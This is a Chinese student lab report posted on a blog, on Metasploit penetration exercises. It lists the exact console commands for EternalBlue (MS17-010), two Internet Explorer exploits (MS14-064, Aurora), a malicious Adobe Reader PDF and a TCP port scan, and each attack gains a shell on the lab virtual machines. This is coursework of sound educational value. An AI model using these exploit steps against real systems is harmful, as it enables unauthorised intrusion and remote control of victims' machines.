20212421 2023-2024-2 《网络与系统攻防技术》实验六实验报告

最新推荐文章于 2024-10-04 13:19:28 发布
最新推荐文章于 2024-10-04 13:19:28 发布
阅读量596 收藏 15
点赞数 11
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63135339/article/details/138628055
版权

20212421 2023-2024-2 《网络与系统攻防技术》实验六实验报告

一、实验内容及要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1一个主动攻击实践,尽量使用最新的类似漏洞;
2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
4 成功应用任何一个辅助模块。

二、实验过程

(1)一个主动攻击实践,尽量使用最新的类似漏洞

使用Nessus,对靶机进行漏洞扫描,结果如下:
在这里插入图片描述在这里插入图片描述发现有两个可以利用的漏洞MS17-010和MS16-047。

输入msfconsole,进入控制台,输入 search MS16-047 查看模块:
在这里插入图片描述发现没有相应的可攻击模块。输入MS17-010 进行查看:
在这里插入图片描述可以看出有几个模块,我选择第一个模块(永恒之蓝)进行攻击,输入use exploit/windows/smb/ms17_010_eternalblue 或者use 0
输入show options 查看:
在这里插入图片描述有yes的部分为必填的,可以看出我们只需要输入靶机的IP地址(192.168.223.132),并执行(exploit)即可:

在这里插入图片描述
ok,这时候就成功了。

(2)一个针对浏览器的攻击,尽量使用最新的类似漏洞

靶机为winxp(IP:192.168.223.133)
进入msf控制台,输入:

search Microsoft Internet Explorer//查找浏览器的漏洞模块

在这里插入图片描述使用第112个,输入:

use exploit/windows/browser/ms14_064_ole_code_execution
show options
set SRVHOST 192.168.223.128//设置监听地址,一般为0.0.0.0,但最好具体为攻击机的IP地址
set URIPATH 20212421ojy//设置url的路径名
exploit

在这里插入图片描述
在这里插入图片描述
在靶机中的浏览器中输入生成网址(http://192.168.223.128:8080/20212421ojy),等待一会儿,有会话会开启。输入sessions看开启的会话,输入sessions -i 1 选择你要的会话,就能获取靶机的shell了:
在这里插入图片描述
在这里插入图片描述我在桌面上创建了一个20212421的文件夹。

第二种:
再次使用攻击模块对浏览器进行攻击时,需要重新启动一下kali虚拟机。
在这里插入图片描述使用第29个攻击模块,输入:

use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.223.128
set URIPATH 20212421_ojy
exploit

在这里插入图片描述

在这里插入图片描述
一样的将生成的url输入靶机浏览器中,等待开启会话,选择其中以后个会话进行攻击,获取shell:
在这里插入图片描述

(3)一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞

下载adobe reader,在靶机里进行安装:点击转下载页面
输入:

search adobe reader
use exploit/windows/fileformat/adobe_cooltype_sing 
show options
set FILENAME 20212421.pdf
exploit

在这里插入图片描述在这里插入图片描述生成了一个pdf文件,在/root/.msf4/local路径下
输入:

cd /root/.msf4/local//跳转到该文件目录
cp 20212421.pdf /home/oujinyuan.Desktop//复制到桌面上

在这里插入图片描述
将生成的pdf文件利用U盘放到靶机里,使用adobe reader打开该文件,就能获取靶机的shell了。

在这里插入图片描述
在这里插入图片描述

(4)成功应用任何一个辅助模块

在这里我使用的是端口扫描模块。
输入:

search portscan
use auxiliary/scanner/portscan/tcp//使用tcp扫描的方式
show options
set ports 1-1024
set rhost 192.168.223.132
set threads 20
exploit

在这里插入图片描述
在这里插入图片描述
可以看出靶机开启了135,139,445三个端口。

三、实验问题及解决方案

问题1:win7的IE8浏览器渗透失败

解决方案:使用search Microsoft Internet Explorer搜索出来的漏洞基本不能渗透IE8浏览器,所以换成了winxp虚拟机,对IE6浏览器进行渗透攻击,结果成功。

问题2:adobe reader安装失败和版本要求

解决方案:adobe reader安装的版本要9的,其他版本的不行。在winxp虚拟机上无法安装上adobe reader9(反正我没成功),最后在win7虚拟机上成功安装,并实验成功。

四、实验感悟

此次实验总体做下来还算可以,基本就是先搜索对应的攻击模块,选择一个,用options看还需哪些部分,补充完整,最后用exploit攻击就行。但最重要的还是对实验的理解,对漏洞利用的搜索、实践和学习,明白漏洞的适应与否。所以做完实验后,收获还是很大的。

五、实验参考

1:实验六 Metasploit攻击渗透实践 20192422李俊洁
2:20192409潘则宇 实验六 Metasploit攻击渗透实践

20212421
关注
20212421 2023-2024-2 《网络系统攻防技术》实验七实验报告
weixin_63135339的博客
05-18 705
1)Social-Engineering Attacks----------------------------社交工程攻击:创建伪装成合法网站的钓鱼页面,用于诱骗用户输入敏感信息。3)Third Party Modules-------------------------------------第三方模块。5)Update SET configuration------------------------------更新SET配置。ping通后,就会有相应的dns_spool生成。
20212421 2023-2024-2 《网络系统攻防技术》实验八实验报告
weixin_63135339的博客
05-22 1891
表单信息的处理过程为:当单击表单中的提交按钮时,在表单中输入的信息就会被提交到服务器中,服务器的有关应用程序会处理提交信息。2:节点类型:DOM 中的节点有多种类型,包括元素节点(如 < p>、< div> 等)、属性节点(如元素的 class、id 等属性)、文本节点等。1:变量和数据类型:JavaScript 支持多种数据类型,如字符串、数字、布尔值、数组、对象等,并使用变量来存储这些数据。JavaScript:JavaScript 是一种在浏览器中运行的脚本语言,它赋予了网页动态和交互性的能力。
20212303 2023-2024-2 《网络系统攻防技术》实验4实验报告
m0_62984455的博客
04-15 1018
二进制文件可能是恶意软件,具有隐藏功能和破坏性。命名不影响其数字指纹。
20212308 2023-2024-2 《网络系统攻防技术》实验八实验报告
Wxc20212308的博客
06-05 734
它提供了对文档的结构化的表述,并定义了一种方式——程序和脚本能够动态地访问和更新文档的内容、结构和样式。随着时间的推移,PHP 已经成为一种广泛使用的开源语言,并且拥有大量的库和框架,可以处理从简单的网站到复杂的企业级应用程序的各种任务。MariaDB是一个开源的关系型数据库管理系统,它是MySQL的一个分支,由MySQL的创始人之一Michael Widenius领导的团队开发和维护。编写一个带有表单的简单的html,模拟用户登录页面,表单中有三个输入框,一个是用户名、一个是口令、还有一个是提交按钮。
20212419 2023-2024-2 《网络系统攻防技术》实验二实验报告
weixin_62989793的博客
03-28 1072
UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista和Windows Server 2008中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。Meterpreter不仅可以获取目标主机的屏幕、摄像头、麦克风等设备,甚至还可以通过一些方式来迷惑用户获取系统的system权限,这也就是说,一旦安装的程序中存在后门,那么整个电脑的所有数据都有可能被泄露。
20212306 2023-2024-2 《网络系统攻防技术》实验五实验报告
m0_62796010的博客
04-23 1727
从besti.edu.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式、该域名对应IP地址、IP地址注册人及联系方式、IP地址所在国家、城市和具体地理位置。获取wechat某一好友的IP地址,并查询获取该好友所在的具体地理位置。使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。靶机IP地址是否活跃;靶机开放了哪些TCP和UDP端口;靶机安装了什么操作系统,版本是多少;靶机上安装了哪些服务。
20212324 2023-2024-2 《网络系统攻防技术》实验八实验报告
foruxx的博客
06-05 729
WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。用户可以提交一段数据库查询代码,根 据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即 SQL注入。在1.1的基础上,编写JavaScript验证用户名、密码的规则。
20212419 2023-2024-2 《网络系统攻防技术实验六实验报告
weixin_62989793的博客
05-12 1668
在本次实验中,我着重探索了几种最新的攻击技术和漏洞,以评估当前系统和软件的安全性。通过深入研究和模拟,我成功地利用了目标系统的漏洞,进而获取了对其进行远程访问的权限。这个漏洞是一个远程代码执行漏洞,允许攻击者通过特制的网页或文件来执行恶意代码,从而完全控制受感染的系统。1.设置靶机中IE浏览器的安全权限:右键“IE”→“属性”→“安全”→“自定义级别”→启用“对标记为可安全执行脚本的ActiveX控件执行脚本”;我将继续关注最新的安全漏洞和攻击技术,不断提升自己的安全意识和技能,为网络安全做出更大的贡献。
20212324 2023-2024-2 《网络系统攻防技术实验六实验报告
foruxx的博客
05-15 1044
估计是程序运行了非法操作,故不仅要修改安全中自定义级别的两项,而是要直接改成默认级别的“低”,从而解决了这个问题。故我猜测攻击中还有其他越权行为,让浏览器产生异常报错。:通过调整安全设置解决了浏览器攻击的问题,我认识到了适当降低安全设置可能带来的风险,但也理解了在实验环境中为了模拟攻击而必须做出的调整。运行getuid,pwd,sysinfo,hashdump等测试shell的可用性,并尝试留下后门等后渗透工作。:从查找漏洞模块到配置参数,再到实际的攻击执行,每一步都需要精确的操作和配置,否则没法成功。
20212422 2023-2024-2 《网络系统攻防技术实验六实验报告
weixin_62978988的博客
05-12 961
实验自由度很高,我对Metasploit的使用也熟练了不少,不管是如何确定需要的payload,还是补全各种options的参数,都更加得心应手。这是网络攻防的第六次实验了,总体上问题遇到的并不少,但是在经过了前五次实验的洗礼,不管是无数次重启虚拟机、重装虚拟机,还是查阅大量的不全并且可能会出问题的教程,我的心态已经变得无比平和。这里会生成一个.docx文件,看后缀非常熟悉,这就是word格式的文件,可以使用office打开。3.一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
20212422 2023-2024-2 《网络系统攻防技术》实验五实验报告
weixin_62978988的博客
04-22 855
轻量级的搜索可以搜素出一些遗留后门,不想被发现的后台入口,中量级的搜索出一些用户信息泄露,源代码泄露,未授权访问等等,重量级的则可能是mdb文件下载,CMS 未被锁定install页面,网站配置密码,php远程文件包含漏洞等重要信息。本次实验是网络功放的第五次实验,相比较前几次的实验,这次实验没有很多复杂烧脑的操作,除了Nessus的下载稍微麻烦一点,其他的操作都比较按部就班,不过简单操作的背后,是用实操带领我熟悉信息搜集技术的相关知识,我是比较喜欢本次实验的节奏与感觉的。因此,该产品很可能存在安全漏洞。
20212422 2023-2024-2 《网络系统攻防技术》实验八实验报告
weixin_62978988的博客
05-15 713
但是可能是因为有一些信息安全保障技术课设的基础,所以我对SQL注入和XSS攻击的方式相对而言比较熟悉,但是对PHP语言进行网页编程的方式就很陌生,所以也是查阅了一些资料,借助了一些AI的力量,并顺利完成了实验。因为我靶场使用的不是webgoat而是pikachu,而pikachu的通关需要用到Burp抓包分析,所以在安装burp这一不上我耗费了不少时间,然后安装好之后,在如何使用Burp抓包问题上又花了很长时间,因为这个抓包软件的使用方式和WireShark的不太一样。
20202414 2022-2023-2 《网络系统攻防技术实验六实验报告
h118189的博客
05-16 1173
本次实验学习目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。我进行了以下实践,对msf进行攻击有了更深的理解:1.1 一个主动攻击实践,使用使用漏洞为永恒之蓝(MS17_010);1.2 一个针对浏览器的攻击,使用漏洞为极光漏洞(MS10_002);1.3 一个针对客户端的攻击,实施了针对Adobe的漏洞的攻击;1.4 成功应用任何一个辅助模块。
20202414 2022-2023-2 《网络系统攻防技术》实验四实验报告
h118189的博客
04-16 489
先查看hash值并查看文件类型信息,kali中有实现该功能的指令可以看到生成了对应的哈希值。本次实验流程较长,也使用了很多各种各样的工具,有些是老师给的,但是我感觉有些如IDA的版本太老了,并不是很好用,于是又去网上找了一个,所以实验的一部分时间都花在下软件卸软件上了。本次实验一开始还是感觉挺不好下手的,尤其是查看字符串的时候,总是一堆完全看不懂的东西,但是参考了学长学姐的资料后,慢慢也按照他们的流程走,也就知道了应该如何操作那些工具以及如何进行对恶意代码进行分析,应该说也算是受益匪浅。
组播基础-1
DC_BLOG的博客
09-27 877
信息的发送者为:组播源 接受相同信息的接收者构成一个组播组,并且每个接收者都是组播组成员 提供组播功能的路由器成为:组播组路由器 组播路由器不仅提供组播路由功能,也提供组成员管理功能,也可以是组播组成员
毕业设计——springboot+netty+websocket实现一个简单的ChatGpt机器人聊天
【CSDN】
09-29 723
WebSocket是html5开始浏览器和服务端进行全双工通信的网络技术。在该协议下,与服务端只需要一次握手,之后建立一条快速通道,开始互相传输数据,实际是基于TCP双向全双工,比http半双工提高了很大的性能,常用于网络在线聊天室等。申请key的教程在项目resources目录readme.md文件中。1、接入了chatGpt接口,只需要替换成自己的key就行。2、实现了与机器人的聊天,可以优化做成智能客服。
项目管理-信息技术发展
最新发布
GAVIN
10-04 227
对称加密:DES 3DES AES RC5 IEDA SM1 SM4。2)分类:PAN LAN MAN WAN 公用网 专用网。4)数据结构模型 层次模型 网状模型 关系模型。1)存储 分类:DAS FAS NAS SAN。物联网(IoT) 感知层 网络层 应用层。8) 5G 高速率 低时延 大连接。设备安全 数据安全 内容安全 行为安全。4.信息安全 保密性 完整性 可用性。3)网络协议 语法 语义 时许。5)IEEE 802 规范。6)TCP/IP 协议。4)网络标准协议 7层。
使用socket编程来实现一个简单的C/S模型(TCP协议)
caiji0169的博客
10-02 1663
下图是基于TCP协议的客户端/服务器程序的一般流程:服务器调用socket()、bind()、listen()完成初始化后,调用accept()阻塞等待,处于监听端口的状态,客户端调用socket()初始化后,调用connect()发出SYN段并阻塞等待服务器应答,服务器应答一个SYN-ACK段,客户端收到后从connect()返回,同时应答一个ACK段,服务器收到后从accept()返回。数据传输的过程:建立连接后,TCP协议提供全双工的通信服务,但是一般的客户端/服务器程序的流程是由客户端主动发起请求,
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值